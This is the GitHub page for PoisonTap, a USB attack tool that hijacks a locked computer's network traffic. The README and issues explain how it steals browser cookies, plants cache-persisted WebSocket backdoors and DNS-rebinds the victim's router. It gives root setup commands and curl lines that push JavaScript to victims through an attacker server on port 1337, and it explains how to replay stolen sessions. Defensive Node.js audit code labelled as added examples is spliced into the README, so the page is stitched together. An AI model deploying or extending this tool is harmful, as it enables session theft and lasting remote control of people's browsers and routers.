
poisontap's Introduction

PoisonTap - siphons cookies, exposes internal router & installs web backdoor on locked computers

Created by @SamyKamkar || https://samy.pl

When PoisonTap (Raspberry Pi Zero & Node.js) is plugged into a locked/password protected computer, it:

  • emulates an Ethernet device over USB (or Thunderbolt)
  • hijacks all Internet traffic from the machine (despite being a low priority/unknown network interface)
  • siphons and stores HTTP cookies and sessions from the web browser for the Alexa top 1,000,000 websites
  • exposes the internal router to the attacker, making it accessible remotely via outbound WebSocket and DNS rebinding (thanks Matt Austin for rebinding idea!)
  • installs a persistent web-based backdoor in HTTP cache for hundreds of thousands of domains and common Javascript CDN URLs, all with access to the user's cookies via cache poisoning
  • allows attacker to remotely force the user to make HTTP requests and proxy back responses (GET & POSTs) with the user's cookies on any backdoored domain
  • does not require the machine to be unlocked
  • backdoors and remote access persist even after device is removed and attacker sashays away


(incredible HTML5 canvas animation by Ara)

PoisonTap evades the following security mechanisms:


Demo

PoisonTap is built for the $5 Raspberry Pi Zero without any additional components other than a micro-USB cable & microSD card, or can work on any Raspberry Pi (1/2/3) with an Ethernet-to-USB/Thunderbolt dongle, or can work on other devices that can emulate USB gadgets such as USB Armory and LAN Turtle.

Live demonstration and more details are available in the video.

Point of Contact: @SamyKamkar // https://samy.pl

Released: November 16, 2016

Source code and download: https://github.com/samyk/poisontap


How PoisonTap Works

PoisonTap produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB/Thunderbolt, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors.

In a nutshell, PoisonTap performs the following:

Network Hijacking

  • Attacker plugs PoisonTap (such as weaponized Raspberry Pi Zero) into a locked computer (even if computer is password protected)
  • PoisonTap emulates an Ethernet device (e.g., Ethernet over USB/Thunderbolt) -- by default, Windows, OS X and Linux recognize an Ethernet device, automatically loading it as a low-priority network device and performing a DHCP request across it, even when the machine is locked or password protected
  • PoisonTap responds to the DHCP request and provides the machine with an IP address; however, the DHCP response is crafted to tell the machine that the entire IPv4 space (0.0.0.0 - 255.255.255.255) is part of PoisonTap's local network, rather than a small subnet (e.g., 192.168.0.0 - 192.168.0.255)
    • Normally it would be irrelevant if a secondary network device connects to a machine as it will be given lower priority than the existing (trusted) network device and won't supersede the gateway for Internet traffic, but...
    • Any routing table / gateway priority / network interface service order security is bypassed due to the priority of "LAN traffic" over "Internet traffic"
    • PoisonTap exploits this network access, even as a low priority network device, because the subnet of a low priority network device is given higher priority than the gateway (default route) of the highest priority network device
    • This means if traffic is destined to 1.2.3.4, while normally this traffic would hit the default route/gateway of the primary (non-PoisonTap) network device, PoisonTap actually gets the traffic because the PoisonTap "local" network/subnet supposedly contains 1.2.3.4, and every other IP address in existence ;)
    • Because of this, all Internet traffic goes over PoisonTap, even though the machine is connected to another network device with higher priority and proper gateway (the true wifi, ethernet, etc.)
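The netmask trick above is visible to the DHCP client before any route is installed, which is where a defender can stop it. The following Node.js check is an added example, not code from PoisonTap or its author: it audits a lease that has already been parsed into an object (the auditLease, prefixLength and MIN_PREFIX names, the /8 threshold and the sample leases are my own assumptions) and rejects an offer whose "local" subnet covers effectively the whole Internet, as well as an offer whose router lies outside the offered subnet.

```javascript
// Added example (not PoisonTap code): sanity-check a DHCP lease before
// accepting it, flagging the "entire IPv4 space is on-link" trick.
// Assumption: the lease has already been parsed into { ip, netmask, router }.

function ipToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error('bad IPv4 address: ' + ip);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// Count the leading one bits of a netmask, rejecting non-contiguous masks.
function prefixLength(netmask) {
  const m = ipToInt(netmask);
  let len = 0;
  while (len < 32 && (m & (0x80000000 >>> len)) !== 0) len++;
  // Everything after the run of ones must be zero for a valid mask.
  const expected = len === 0 ? 0 : (0xffffffff << (32 - len)) >>> 0;
  if (m !== expected) throw new Error('non-contiguous netmask: ' + netmask);
  return len;
}

// Policy (assumed): a LAN lease should describe a LAN, not the Internet.
// Anything broader than /8 is treated as an attempt to capture all traffic.
const MIN_PREFIX = 8;

function auditLease(lease) {
  const findings = [];
  const plen = prefixLength(lease.netmask);
  if (plen < MIN_PREFIX) {
    findings.push(`subnet /${plen} covers the whole Internet (expected >= /${MIN_PREFIX})`);
  }
  if (lease.router) {
    const mask = plen === 0 ? 0 : (0xffffffff << (32 - plen)) >>> 0;
    const routerNet = (ipToInt(lease.router) & mask) >>> 0;
    const hostNet = (ipToInt(lease.ip) & mask) >>> 0;
    if (routerNet !== hostNet) findings.push('router is not inside the offered subnet');
  }
  return { accept: findings.length === 0, prefixLength: plen, findings };
}

// Constructed sample leases (not captured traffic). The second mirrors the
// netmask 0.0.0.0 offer described in the write-up.
const NORMAL_LEASE = { ip: '192.168.0.23', netmask: '255.255.255.0', router: '192.168.0.1' };
const POISONED_LEASE = { ip: '1.0.0.2', netmask: '0.0.0.0', router: '1.0.0.1' };

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditLease(NORMAL_LEASE));   // accept: true
  console.log(auditLease(POISONED_LEASE)); // accept: false, subnet /0 finding
}
```

A real client would run this between receiving the DHCPOFFER and installing the connected route; the same check belongs in any endpoint agent that watches interface configuration, since the interface the OS auto-configures here is the one the user never asked for.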

Cookie Siphoning

  • As long as a web browser is running in the background, it is likely one of the open pages will perform an HTTP request in the background (for example to load a new ad, send data to an analytics platform, or simply continue to track your web movements) via AJAX or dynamic script/iframe tags
    • You can see this for yourself, go into your devtools/inspector (typically Cmd+Shift+I or Ctrl+Shift+I), go to a heavily visited website, click on the Network tab, and watch as remote resources continue to be accessed even as you take no action on the page
  • Upon this HTTP request, because all traffic exits onto the PoisonTap device, PoisonTap DNS spoofs on the fly to return its own address, causing the HTTP request to hit the PoisonTap web server (Node.js)
    • If the DNS server is pointing to an internal IP (LAN) that PoisonTap cannot get privilege for, the attack continues to function as the internal DNS server will produce public IP addresses for the various domains attacked, and it is the public IP addresses that PoisonTap has already hijacked
    • Once the internal DNS server responds, the web browser hits the public IP, ultimately hitting the PoisonTap web server (Node.js) in either scenario
  • When the Node web server receives the request, PoisonTap responds with a response that can be interpreted as HTML or as Javascript, both of which execute properly (many websites will load HTML or JS in background requests)
  • The HTML/JS-agnostic page then produces many hidden iframes, each iframe across a different Alexa-top-1-million domain
    • Any "X-Frame-Options" security on the domain is bypassed as PoisonTap is now the HTTP server and chooses which headers to send to the client
    • As every iframe HTTP request to a site is made (eg, http://nfl.com/PoisonTap), the HTTP cookies are sent from the browser to the "public IP" hijacked by PoisonTap, which swiftly logs the cookies/authentication information, logging tens of thousands of the user's cookies into PoisonTap
    • Any "HttpOnly" cookie security is bypassed and those cookies are captured as no Javascript is executed on the domain itself, but rather only used to load the iframe in the first place
    • Any Cross-Origin Resource Sharing or Same-Origin Policy security is bypassed as the domain being accessed appears legitimate to the browser
    • Because we're capturing cookies rather than credentials, any 2FA/MFA implemented on the site is bypassed when the attacker uses the cookie to login. This is because we're not actually performing the login function but rather continuing an already logged-in session which does not trigger two-factor authentication
    • If a server is using HTTPS, but the cookies do not explicitly set the Secure cookie flag, the HTTPS protection is bypassed and the cookie is sent to PoisonTap

Remotely Accessible Web-Based Backdoors

  • While PoisonTap was producing thousands of iframes, forcing the browser to load each one, these iframes are not blank pages at all, but rather HTML+Javascript backdoors that are cached indefinitely
  • Because PoisonTap force-caches these backdoors on each domain, the backdoor is tied to that domain, enabling the attacker to use the domain's cookies and launch same-origin requests in the future, even if the user is currently not logged in
    • For example, when the http://nfl.com/PoisonTap iframe is loaded, PoisonTap accepts the diverted Internet traffic, responds to the HTTP request via the Node web server
    • Additional HTTP headers are added to cache the page indefinitely
  • The actual response of the page is a combination of HTML and Javascript that produces a persistent WebSocket out to the attacker's web server (over the Internet, not on the PoisonTap device)
    • The WebSocket remains open allowing the attacker to, at any point in the future, connect back to the backdoored machine and perform requests across any origin that has the backdoor implemented (the Alexa top 1,000,000 sites -- see below)
    • If the backdoor is opened on one site (e.g., nfl.com), but the user wishes to attack a different domain (e.g., pinterest.com), the attacker can load an iframe on nfl.com to the pinterest.com backdoor (http://pinterest.com/PoisonTap)
    • Again, any "X-Frame-Options", Cross-Origin Resource Sharing, and Same-Origin Policy security on the domain is entirely bypassed as the request will hit the cache that PoisonTap left rather than the true domain

Internal Router Backdoor & Remote Access

  • The one network PoisonTap is not able to hijack is the actual LAN subnet of the true network interface (for example, if the user's wifi subnet is 192.168.0.x, this network is unaffected), but...
  • PoisonTap force-caches a backdoor on a special host, specifically the target router's IP prepended to ".ip.samy.pl", e.g. 192.168.0.1.ip.samy.pl, essentially producing a persistent DNS rebinding attack
    • When using PoisonTap as the DNS server (victim using public DNS server), PoisonTap responds with the specialized PoisonTap IP temporarily (1.0.0.1), meaning any requests at that moment will hit the PoisonTap web server
    • If instead the DNS server is set to the internal network (e.g., 192.168.0.x), an additional specially crafted request is made to 1.0.0.1.pin.ip.samy.pl which tells my specialized DNS server (on the public Internet) to temporarily respond to any [ip.address].ip.samy.pl address with the "pinned" address (1.0.0.1) for several seconds
    • PoisonTap then quickly sets a backdoor on http://192.168.0.1.ip.samy.pl/PoisonTap, which for the moment points to the PoisonTap device at 1.0.0.1, allowing the backdoor to be accessed and cached from the PoisonTap device
  • DNS pinning and DNS rebinding security are bypassed due to exhausting the DNS pinning table, due to the hundreds of thousands of requests just previously made, and no rebinding needs to occur in the future, making this attack persistent over long periods of time (thanks to Matt Austin for sharing this attack with me!)
  • Now that a backdoor is force-cached to http://192.168.0.1.ip.samy.pl/PoisonTap, any future requests to the 192.168.0.1.ip.samy.pl will hit the unpinned IP address, causing 192.168.0.1 to resolve instead, pointing directly to the router
  • This means if loading the 192.168.0.1.ip.samy.pl/PoisonTap host in an iframe remotely over the backdoor, you can now perform AJAX GET/POSTs to any other page on the internal router, entirely remotely, thus allowing remote access to the internal router
    • This can lead to other attacks on the router which the attacker may have never had access to in the first place, such as default admin credentials on the router being used to overwrite DNS servers, or other authentication vulnerabilities being exposed

Recap of the DNS server:

  • [ip.addy].ip.samy.pl normally responds with [ip.addy]
  • 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
  • [ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy]
    • 1.0.0.1.pin.ip.samy.pl -> 1.0.0.1
    • 192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL)
    • (after ~5 seconds)
    • 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
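The last line of this recap, a public name resolving to a router address, is exactly what a rebinding filter on the resolver rejects. The following is an added example, not part of PoisonTap or the author's DNS server: a check in the spirit of dnsmasq's --stop-dns-rebind option, written as a Node.js function over already-parsed answer records. The function names, the sample records and the trusted-zone list are constructed for the example.

```javascript
// Added example (not PoisonTap code): a resolver-side rebinding filter.
// Any A record that maps a name onto a private, loopback or link-local
// address is dropped unless the name belongs to a zone the operator has
// explicitly marked as allowed to hand out internal addresses.

function isInternalIPv4(ip) {
  const p = ip.split('.').map(Number);
  if (p.length !== 4 || p.some(o => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error('bad IPv4 address: ' + ip);
  }
  return p[0] === 10 ||                           // 10.0.0.0/8
    (p[0] === 172 && p[1] >= 16 && p[1] <= 31) || // 172.16.0.0/12
    (p[0] === 192 && p[1] === 168) ||             // 192.168.0.0/16
    p[0] === 127 ||                               // loopback
    (p[0] === 169 && p[1] === 254) ||             // link-local
    p[0] === 0;                                   // "this" network
}

// True when `name` is the zone itself or a subdomain of a trusted zone.
function inTrustedZone(name, trustedZones) {
  const n = name.toLowerCase().replace(/\.$/, '');
  return trustedZones.some(z => n === z || n.endsWith('.' + z));
}

function filterAnswers(name, answers, trustedZones = []) {
  const accepted = [];
  const dropped = [];
  for (const rr of answers) {
    if (rr.type === 'A' && isInternalIPv4(rr.data) && !inTrustedZone(name, trustedZones)) {
      dropped.push({ ...rr, reason: 'public name resolved to internal address (rebinding)' });
    } else {
      accepted.push(rr);
    }
  }
  return { name, accepted, dropped };
}

// Constructed sample answers (not real DNS traffic). The first mirrors the
// [ip].ip.samy.pl pattern from the recap; the others are ordinary records,
// using a TEST-NET address and a made-up intranet zone.
const REBIND_ANSWER = { name: '192.168.0.1.ip.samy.pl', answers: [{ type: 'A', data: '192.168.0.1', ttl: 60 }] };
const NORMAL_ANSWER = { name: 'www.example.com', answers: [{ type: 'A', data: '203.0.113.10', ttl: 3600 }] };
const INTRANET_ANSWER = { name: 'wiki.corp.example', answers: [{ type: 'A', data: '10.1.2.3', ttl: 300 }] };

if (typeof require !== 'undefined' && require.main === module) {
  console.log(filterAnswers(REBIND_ANSWER.name, REBIND_ANSWER.answers));   // 1 dropped
  console.log(filterAnswers(NORMAL_ANSWER.name, NORMAL_ANSWER.answers));   // 1 accepted
  console.log(filterAnswers(INTRANET_ANSWER.name, INTRANET_ANSWER.answers, ['corp.example'])); // 1 accepted
}
```

Two caveats follow from the recap itself. During the pinned phase the name resolves to 1.0.0.1, a public address, so this filter sees nothing wrong; what it blocks is the later resolution to 192.168.0.1, which is the step that turns the cached backdoor into router access. And the filter only helps if the host's resolver path is not the hijacked interface, so it belongs on a resolver the host is forced to use rather than on one the DHCP lease nominates.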

Additional Remotely Accessible Web-Based Backdoors

  • Additionally, PoisonTap replaces thousands of common, CDN-based Javascript files, e.g. Google and jQuery CDNs, with the correct code plus a backdoor that gives the attacker access to any domain loading the infected CDN-based Javascript file
  • Because a backdoor is left on each domain, this allows the attacker to remotely force the backdoored browser to perform same-origin requests (AJAX GET/POSTs) on virtually any major domain, even if the victim does not currently have any open windows to that domain
  • The backdoor will now live on any additional site that also uses one of these infected, HTTP-based, CDN Javascript frameworks when the victim visits the site

Securing Against PoisonTap

Server-Side Security

If you are running a web server, securing against PoisonTap is simple:

  • Use HTTPS exclusively, at the very least for authentication and authenticated content
    • Honestly, you should use HTTPS exclusively and always redirect HTTP content to HTTPS, preventing a user being tricked into providing credentials or other PII over HTTP
  • Ensure Secure flag is enabled on cookies, preventing HTTPS cookies from leaking over HTTP
  • When using remote Javascript resources, use the Subresource Integrity script tag attribute
  • Use HSTS to prevent HTTPS downgrade attacks
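The four items above can be checked mechanically against any response a server sends. As an added example (not code from the PoisonTap repository), the following Node.js audit takes a response object with lowercase header names and an HTML body and reports missing Secure/HttpOnly cookie flags, a missing or zero HSTS max-age, and remote scripts fetched over plain HTTP or without Subresource Integrity. The responses are constructed and the integrity value is a placeholder, not a real hash.

```javascript
// Added example (not PoisonTap code): audit an HTTP response for the
// server-side mitigations listed above. Input is a constructed response
// object, not a live fetch; header names are assumed to be lowercase.

function parseSetCookie(value) {
  const [pair, ...attrs] = value.split(';').map(s => s.trim());
  const name = pair.split('=')[0];
  const flags = new Set(attrs.map(a => a.split('=')[0].toLowerCase()));
  return { name, secure: flags.has('secure'), httpOnly: flags.has('httponly') };
}

function auditCookies(setCookieValues) {
  const findings = [];
  for (const v of setCookieValues) {
    const c = parseSetCookie(v);
    if (!c.secure) findings.push(`cookie ${c.name} lacks Secure: it will be sent over plain HTTP`);
    if (!c.httpOnly) findings.push(`cookie ${c.name} lacks HttpOnly`);
  }
  return findings;
}

// HSTS only takes effect with a positive max-age.
function auditHsts(headerValue) {
  if (!headerValue) return ['no Strict-Transport-Security header'];
  const m = /max-age=(\d+)/i.exec(headerValue);
  if (!m || Number(m[1]) === 0) return ['Strict-Transport-Security has no positive max-age'];
  return [];
}

// Remote scripts must be fetched over HTTPS and carry an integrity attribute.
function auditScripts(html) {
  const findings = [];
  const tagRe = /<script\b([^>]*)>/gi;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const attrs = t[1];
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (!src) continue; // inline script: nothing to pin
    const url = src[1];
    if (/^http:\/\//i.test(url)) findings.push(`script ${url} is loaded over plain HTTP`);
    if (/^(https?:)?\/\//i.test(url) && !/\bintegrity\s*=/i.test(attrs)) {
      findings.push(`script ${url} has no Subresource Integrity hash`);
    }
  }
  return findings;
}

function auditResponse(resp) {
  return [
    ...auditCookies(resp.headers['set-cookie'] || []),
    ...auditHsts(resp.headers['strict-transport-security']),
    ...auditScripts(resp.body || ''),
  ];
}

// Constructed responses: a weak one and its hardened counterpart.
// "sha384-PLACEHOLDER" stands in for a real integrity hash.
const WEAK_RESPONSE = {
  headers: { 'set-cookie': ['session=abc123; Path=/'] },
  body: '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>',
};
const HARDENED_RESPONSE = {
  headers: {
    'set-cookie': ['session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
    'strict-transport-security': 'max-age=31536000; includeSubDomains',
  },
  body: '<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditResponse(WEAK_RESPONSE));     // five findings
  console.log(auditResponse(HARDENED_RESPONSE)); // []
}
```

The cookie and HSTS checks map directly onto the siphoning and downgrade steps described earlier: a cookie without Secure is handed over on the first plain-HTTP iframe, and a script without an integrity attribute is exactly the CDN file that a poisoned cache can replace.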

Desktop Security

  • Adding cement to your USB and Thunderbolt ports can be effective
  • Closing your browser every time you walk away from your machine can work, but is entirely impractical
  • Disabling USB/Thunderbolt ports is also effective, though also impractical
  • Locking your computer has no effect as the network and USB stacks operate while the machine is locked, however, going into an encrypted sleep mode where a key is required to decrypt memory (e.g., FileVault2 + deep sleep) solves most of the issues as your browser will no longer make requests, even if woken up

Download

Source code: https://github.com/samyk/poisontap


Installation / File Breakdown

Note: If you find the device is NOT acting as an Ethernet controller automatically (older versions of Windows, for example), you can change the VID and PID in pi_startup.sh

# Instructions adjusted from https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
sudo bash

# If Raspbian BEFORE 2016-05-10, then run next line:
BRANCH=next rpi-update

echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo "dtoverlay=dwc2" >> /boot/config.txt
echo -e "dwc2\ng_ether" >> /etc/modules
sudo sed --in-place "/exit 0/d" /etc/rc.local
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

Place dhcpd.conf in /etc/dhcp/dhcpd.conf and the rest of the files in /home/pi/poisontap, then reboot to ensure everything is working.

There are a number of files in the repo, which are used on different sides. The list:

  • backdoor.html - Whenever a http://hostname/PoisonTap URL is hit to exfiltrate cookies, this file is what is returned as the force-cached content. It contains a backdoor that produces an outbound websocket to samy.pl:1337 (adjustable to any host/port) that remains open waiting for commands from the server. This means when you load an iframe on a site, such as http://hostname/PoisonTap, this is the content that gets populated (even after PoisonTap is removed from the machine).
  • backend_server.js - This is the Node.js server that you run on your Internet-accessible server. It is what the backdoor.html connects to (e.g., samy.pl:1337). This is the same server you connect to in order to send commands to your PoisonTapped minion machines, e.g.
# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'
  • pi_poisontap.js - This runs via Node.js on the Raspberry Pi Zero and is the HTTP server responsible for handling any HTTP requests intercepted by PoisonTap, storing siphoned cookies, and injecting the cached backdoors.
  • pi_startup.sh - This runs upon startup on the Raspberry Pi Zero in order to set the device up to emulate an Ethernet-over-USB gadget, set up our evil DHCP server, allow traffic rerouting, DNS spoofing, and to launch pi_poisontap.js above.
  • target_backdoor.js - This file is prepended to any CDN-related Javascript files, thus backdooring them, e.g. Google CDN's jQuery URL.
  • target_injected_xhtmljs.html - This is the code that gets injected into unintentional/background HTTP/AJAX requests on the victim's machine and spawns the entire attack. It is constructed in a way that it can be interpreted as HTML or as Javascript and still execute the same code. Additionally, the amazing HTML5 canvas is by the incredible Ara on CodePen and was too amazing not to include. This is the graphical craziness that appears when the page gets taken over by PoisonTap.
  • poisontap.cookies.log - This file is generated once the user's machine starts sending HTTP requests to PoisonTap and logs the cookie from the browser along with the associated URL/domain it belongs to.

Frequently Asked Questions

  • Q: How do you add additional domains to be backdoored?
  • A: The list of domains to be backdoored is set in target_injected_xhtmljs.html by the getDoms() function. This itself is populated by the alexa1m.sh script in the root of the repo. If you wish to add additional domains to this list, you can simply amend the return call in getDoms().
  • Q: How do you use the captured cookies?
  • A: You can use the Document.cookie API directly from the JavaScript console in your browser to set cookies. This StackOverflow post also has a few Chrome-specific suggestions, for example the Cookie Inspector Chrome extension.
  • Q: How do I clean Poisontap from a machine?
  • A: You should clear the local OS DNS cache, as well as any browser caches. You may also need to invalidate any sessions that were logged in at the time, which may have leaked cookies. Ensure that these invalidate existing cookies, rather than simply logging you out. (If you want to safely work with a PoisonTap device on your current machine, make sure to exit any browser; then you should be able to safely connect it to your machine.)

Contact

Point of Contact: @SamyKamkar

You can see more of my projects or contact me at https://samy.pl.

poisontap's People

Contributors

ddgva, hxxxxxs, jr-k, mikecoles, natebrady23, plazmaz, samyk, victorhooi


poisontap's Issues

Mac: Works Once Only ?

I got it to work on my macbook air
then
I removed the RNDIS/Ethernet Gadget thing that gets installed under the Network manager in osx
I deleted the cache from safari to remove the backdoors.

But when I replug my Raspberry Pi Zero, it doesn't install the RNDIS/Ethernet Gadget again, nor the backdoors?

What I'm wondering is: is there some type of file that is created that tells the Pi which machines have been compromised already, so it doesn't re-do its thing?

Note- it installs on others computers fine, but not the same one. hmmmmm

Installation Smooth & Great But... Not Working...

I ran through the installation following all (I hope) aspects including the config.txt and cmdline.txt. On booting up and connecting to my Mac, the eth card is there but any site/browser and program using an inet connection just doesn't open. As soon as I disconnect everything is back to normal. Sorry for the silly question... but does anybody know what I did wrong? Please get back if you need more info. Bruno

HTTPS Cookies and Popping a Shell

How do you browse using the stolen session cookies?

What can you really do with the browser backdoor this provides? All I can imagine is maybe use a BEEF inject.js but can you gain shell access?

WPAD?

Have you tried to force feed a windows 'victim' a WPAD response to get some of that sweet https action?

Backdoor Cleanup?

Is there any automated method to remove the persistent backdoors from a machine, either remotely or via plugging the device into the target machine(s) again? More of a feature request than an issue, but it would be nice to have.

Installation/setup

Hi,

Any link for guiding on how to install/setup the PoisonTap.

Thanking you in anticipation.

Regards,

Riz

HELP: Poisontap for beginners

hi guys!

I work in the computer department of a public school and we want to educate the community about computer security. We want to introduce them to Poisontap.

We buy a raspberry pi 3 in order to program the poisontap. But it seems to be more complicated than expected. Is there a detail procedure from the beginning? Or are there existing files to download on the raspberry that would make the task easier?

I am new to programming. Thanks for helping the community.

Thank you guys!!

Poisontap on Teensy 3.6 w/ SD card

Allo sir. Would you consider this feasible? It has native eth support, can support spi flash, and can carry a micro SD. There is also whispers of this being able to interface sdram via DMA. I haven't personally confirmed that but will running tests soon. Thanks for your time on this project. Great work so far.

Source code for ip.samy.pl?

The DNS rebinding feature of poisontap depends on using your custom DNS server on ip.samy.pl. Given that the second stage of the DNS rebinding attack uses the domain to inject an iframe, I think users would feel a lot better knowing we could use our own DNS instead of putting all of our eggs in your basket.
Besides, the pinning feature of the DNS seems quite unique and probably merits being a project of its own!

Running backend_server.js

Hello,

I have set up the raspberry pi 0 and successfully tested it on windows 10. The only issue I am running into is the server itself. I am using Ubuntu 14.04 as the server. I know that backend_server.js has to be on the server but I do not know where specifically to place it. Once it is in its appropriate location do you simply run "node backend_server.js" followed by the curl commands?
Should running node backend_server.js give me a return? Currently it is not.
When I run the curl 'http://192.XXX.XXX.XXX:1337/exec?alert("muahahahaha")' I get a connection refused.

Any help would be appreciated.
Thank you!

Mobile device support

Could this be made to work on locked Android phones? I'm assuming they would need otg host enabled by the user first right? (I don't personally own an Android device but I may borrow one once I get my pi zero.) It would be interesting to see if common android background requests could be abused and how they are evaluated. I doubt there is anything happening in the background which renders in a web view except maybe those network proxy authentication pop-ups some hotels use. (Sorry don't know the term.) Are there common third party/vendor launchers which use a web view we could inject into? Are there other features accessible from the lock screen like Google assistant we could trick into loading a web resource? if any the browser prefetch pages you ask assistant to load before unlocking?

What about a Bluetooth network device that asks to pair with a target phone? Obviously this would require some user interaction to pair but in the right circumstance it could be convincing. (Spoof car name when the target enters a car for example.)

As far as I know the only networking that happens on iOS over lightning is hosted by the phone for tethering which might prevent this attack.

Windows mitigation

Block USB Ethernet gadgets (tested with a Pi Zero, but I believe this would block all USB Ethernet gadgets):
Go into mmc.exe and add the Group Policy Object Editor plugin (Local Computer) and navigate to Computer Configuration|Administrative Templates|System|Device Installation|Device Installation Restrictions.
Select the "Enabled" radio button, click the checkbox for "also apply to matching devices that are already installed",
then click "Show" and enter
USB\VID_0525&PID_A4A2
and click "OK" and "OK" again; you can close the local policy.
In a few seconds you should see the device go away and get a message about it being blocked.

pi_startup.sh not launching at boot - or is it?

Hi,

I have tried to get this to work upon boot but not having any luck... I have followed these instructions:

Setup startup script: sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh. Also we need to run pi_startup.sh at boot time: sudo nano /etc/rc.local and add /etc/init.d/pi_startup.sh & JUST BEFORE exit 0.

but if I reboot and check if any of the processes that pi_startup.sh launches (ps aux | grep SCREEN) I can see dnsspoof running but no nodejs pi_poisontap.js...

How can I check if pi_startup.sh is definitely executing on boot via rc.local?
And why might node not be running if the startup script is running?

Thanks..

SyntaxError when running backend_server.js in Node

Hi,

I'm getting a bunch of SyntaxErrors thrown by NodeJS when trying to run the backend_server.js on my server. I've tried the repo I pulled yesterday, and then re-cloned the latest version via Git just to make double-sure..

|- /home/jono jono@ubuntu:~$ git clone https://github.com/samyk/poisontap.git Cloning into 'poisontap'... remote: Counting objects: 370, done. remote: Compressing objects: 100% (83/83), done. remote: Total 370 (delta 295), reused 360 (delta 285), pack-reused 0 Receiving objects: 100% (370/370), 4.34 MiB | 2.91 MiB/s, done. Resolving deltas: 100% (295/295), done. Checking connectivity... done.

Trying to launch throws this error:

nodejs backend_server.js

/home/jono/poisontap/backend_server.js:9 var server = http.createServer((request, response) => { ^

SyntaxError: Unexpected token > at Module._compile (module.js:439:25) at Object.Module._extensions..js (module.js:474:10) at Module.load (module.js:356:32) at Function.Module._load (module.js:312:12) at Function.Module.runMain (module.js:497:10) at startup (node.js:119:16) at node.js:902:3

It's not displaying particularly well in this Markdown codeblock but I think you get the gist. It's not liking the =>.

Anyone else having this issue? Admittedly node isn't something I've used in anger so this could be a fairly daft question...

Route All Traffic?

Has anyone come up with a way to allow all traffic through PoisonTap? I would like to allow all traffic to flow through the Zero so I can pcap it, but I cannot figure out how to make iptables do it.

Playing around with some of the iptables rules I noticed you can do things like and build out a decent list:
/sbin/iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 22 -j REDIRECT --to-port 22

but I have not figured out a way to just allow all traffic to route through pi. Anyone have any ideas?

The back door does not work

I have set up PoisonTap on my NetHunter Nexus 6P. When I plug it into my Win 8.1 USB port, all network traffic goes to the Nexus 6P, and on the phone screen I can see my browser cookies (e.g. youku.com).
I have modified backdoor.html:
var socket = new WebSocket('ws://YOURDOMAIN:1337');
to
var socket = new WebSocket('ws://my IP:1337');

and modified target_backdoor.js:
new Image().src='http://YOURDOMAIN/log.php?log='+document.cookies;
to
new Image().src='http://my IP/log.php?log='+document.cookies;
My online server is running backend_server.js listening on port 1337 successfully and log.php works,
but when I use the command http://my IP:1337/exec?alert("muahahahaha") (PS: "my IP" is my server IP)
nothing happens in my browser. Why?
And when I visit the list of URLs in target_injected_xhtmljs.html,
the browser jumps to your video in the interface. What does it do?

How to trigger backdoor? thx!

backdoor test succeed,But there's still a question

my device is nethunter nexus6p
I plugged PoisonTap into my Win 8.1 machine, which had a browser open.
The browser opened sites like youku.com and msn.com,
then the Nexus 6P showed the cookies of the sites.
When my browser opened http://youku.com/PoisonTap it was empty, and I sent
curl 'http://my ip:1337/exec?alert("muahahahaha")'
and the browser popped "muahahahaha" successfully.
So, when I want to use the backdoor, must I insert a frame into the phishing page and then let the victim visit it?
Can I use other methods to actively trigger the backdoor?
Please help me, thx!

cookies cookies cookies

I get the animation and the graphs (network tab on dev tools chrome) when The pi zero (PT) is plugged in (win10 laptop)
When i check the poisontap folder afterwards on the pi zero, I have a "poisontap.cookies.log" but all it contains is a date and hour and
"poisontap is listening"

Where are the cookies?
Should i do something on the laptop?

On the server side (a Raspberry Pi 3), I'm having the problem that no websocket is being opened, but I thought there would be cookies locally on the Pi Zero without the server side working?

PoisonTap is not working

Hi!

I bought a Raspberry Pi Zero (my first Pi) to try this and I installed Raspbian on it. I had some problems configuring the updates because I only had one USB input, but I solved it with sleeps and yes pipes. Then I created the /home/pi/poisontap/ dir and I copied all the code of this repo there. I followed the installation instructions with the echos and the updates and I finally moved dhcpd.conf to /etc/dhcp/dhcpd.conf. When I plug the Pi into my computer (I use Ubuntu) it detects the new Wired Connection with the name (Linux 4.4.34+ with 20980000.usb RNDIS/Ethernet Gadget) but that's all I can see. I have the browser (I use Firefox) open and I try to open and close a lot of http or https connections, some of them with password and at the top of the Alexa list (Google, Amazon...). But nothing happens.

